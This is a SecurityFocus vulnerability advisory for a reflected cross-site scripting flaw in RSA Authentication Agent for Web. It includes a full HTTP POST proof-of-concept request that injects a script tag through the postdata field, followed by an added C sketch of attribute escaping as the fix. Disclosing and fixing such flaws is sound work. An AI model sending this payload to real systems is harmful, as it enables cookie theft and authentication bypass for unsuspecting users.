source: https://www.securityfocus.com/bid/13168/info

A remote cross-site scripting vulnerability affects the RSA Security RSA Authentication Agent for Web. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. Due to the nature of the application, bypassing authentication requirements may be possible.

POST /WebID/IISWebAgentIF.dll HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
Cache-Control: no-cache
Referer: https://www.example.com/
Content-Length: 135

stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6
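
Added example, not part of the original advisory and not RSA's code: the missing output encoding for the reflected postdata value, sketched in C. It assumes the agent echoes postdata into a double-quoted hidden-field attribute, which the page does not state; html_attr_escape, render_hidden_field and the field markup are hypothetical names.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Escape `in` for a double-quoted HTML attribute value.
 * Returns the escaped length, or -1 if `out` (capacity `cap`) is too small. */
static int html_attr_escape(const char *in, char *out, size_t cap)
{
    size_t n = 0;
    if (cap == 0)
        return -1;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = rep ? strlen(rep) : 1;
        if (n + len >= cap)
            return -1;          /* fail closed, never truncate mid-entity */
        if (rep) memcpy(out + n, rep, len);
        else     out[n] = *in;
        n += len;
    }
    out[n] = '\0';
    return (int)n;
}

/* Hypothetical page fragment (assumption): the posted value is echoed
 * into a hidden form field. Oversized input is rejected, not echoed. */
static int render_hidden_field(const char *postdata, char *html, size_t cap)
{
    char safe[512];
    if (html_attr_escape(postdata, safe, sizeof safe) < 0)
        return -1;
    int w = snprintf(html, cap,
        "<input type=\"hidden\" name=\"postdata\" value=\"%s\">", safe);
    return (w < 0 || (size_t)w >= cap) ? -1 : w;
}

int main(void)
{
    /* Constructed input: the postdata value from the request above. */
    char html[1024];
    if (render_hidden_field("\"><script>alert(\"Vulnerable\")</script>",
                            html, sizeof html) < 0) return 1;
    puts(html);
    return 0;
}
```

With the value encoded, the quote and angle brackets stay inside the attribute as text, so the markup cannot be closed early by the submitted data.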